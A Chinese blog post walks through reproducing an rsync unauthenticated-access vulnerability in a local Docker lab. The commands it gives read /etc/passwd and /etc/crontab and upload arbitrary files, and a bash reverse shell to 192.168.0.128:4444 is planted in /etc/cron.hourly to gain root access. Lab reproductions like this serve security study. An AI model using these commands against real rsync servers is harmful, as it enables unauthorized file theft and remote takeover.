溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

rsync漏洞復(fù)現(xiàn)的示例分析

發(fā)布時(shí)間:2021-12-27 14:06:29 來源:億速云 閱讀:241 作者:小新 欄目:安全技術(shù)

小編給大家分享一下rsync漏洞復(fù)現(xiàn)的示例分析,相信大部分人都還不怎么了解,因此分享這篇文章給大家參考一下,希望大家閱讀完這篇文章后大有收獲,下面讓我們一起去了解一下吧!

rsync漏洞復(fù)現(xiàn)

1.首先要進(jìn)入我們下載的漏洞環(huán)境目錄

rsync漏洞復(fù)現(xiàn)的示例分析

2.編譯及運(yùn)行rsync服務(wù)器

docker-compose up -d

rsync漏洞復(fù)現(xiàn)的示例分析

發(fā)現(xiàn)拉取成功

rsync漏洞復(fù)現(xiàn)的示例分析

查看地址

rsync漏洞復(fù)現(xiàn)的示例分析

3.漏洞復(fù)現(xiàn)

先查看一下他的模塊的文件

rsync rsync://127.0.0.1/src

rsync漏洞復(fù)現(xiàn)的示例分析

任意文件上傳

只需要touch隨便創(chuàng)建一個(gè)即可

rsync zxc.txt rsync://127.0.0.1/src/home

查看上傳的文件

rsync rsync://127.0.0.1:873/src/home/zxc.txt

rsync漏洞復(fù)現(xiàn)的示例分析

任意文件下載

rsync://127.0.0.1/src/etc/passwd

rsync漏洞復(fù)現(xiàn)的示例分析

通過寫cron任務(wù)反彈shell

1、下載任務(wù)計(jì)劃文件

rsync -av rsync://127.0.0.1/src/etc/crontab crontab.txt

rsync漏洞復(fù)現(xiàn)的示例分析

任務(wù)計(jì)劃表示在每小時(shí)的第17分鐘執(zhí)行run-parts --report /etc/cron.hourly命令

17 * * * * root cd / && run-parts --report /etc/cron.hourly

2、構(gòu)造shell

rsync漏洞復(fù)現(xiàn)的示例分析

#!/bin/bash /bin/bash -i >& /dev/tcp/192.168.0.128/4444 0>&1 //ip為kali的地址

rsync漏洞復(fù)現(xiàn)的示例分析

上傳shell

rsync -av shell rsync://127.0.0.1/src/etc/cron.hourly

rsync漏洞復(fù)現(xiàn)的示例分析

然后反彈shell,但是需要等17分鐘,要不然要修改那個(gè)文件

rsync漏洞復(fù)現(xiàn)的示例分析

第二種獲取shell的方式

docker ps

rsync漏洞復(fù)現(xiàn)的示例分析

sudo docker exec -it c1de2543df7b bash

rsync漏洞復(fù)現(xiàn)的示例分析

發(fā)現(xiàn)成功了

正好我們?cè)谶@里修改一下那個(gè)執(zhí)行文件

首先要安裝vim

apt-get update ##更新

apt install vim

rsync漏洞復(fù)現(xiàn)的示例分析

然后修改成一分鐘

rsync漏洞復(fù)現(xiàn)的示例分析

或者第二步驟:

直接進(jìn)入上傳shell 那個(gè)目錄

cd /etc/cron.hourly/

./shell

rsync漏洞復(fù)現(xiàn)的示例分析

發(fā)現(xiàn)反彈成功

rsync漏洞復(fù)現(xiàn)的示例分析

以上是“rsync漏洞復(fù)現(xiàn)的示例分析”這篇文章的所有內(nèi)容,感謝各位的閱讀!相信大家都有了一定的了解,希望分享的內(nèi)容對(duì)大家有所幫助,如果還想學(xué)習(xí)更多知識(shí),歡迎關(guān)注億速云行業(yè)資訊頻道!

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請(qǐng)聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI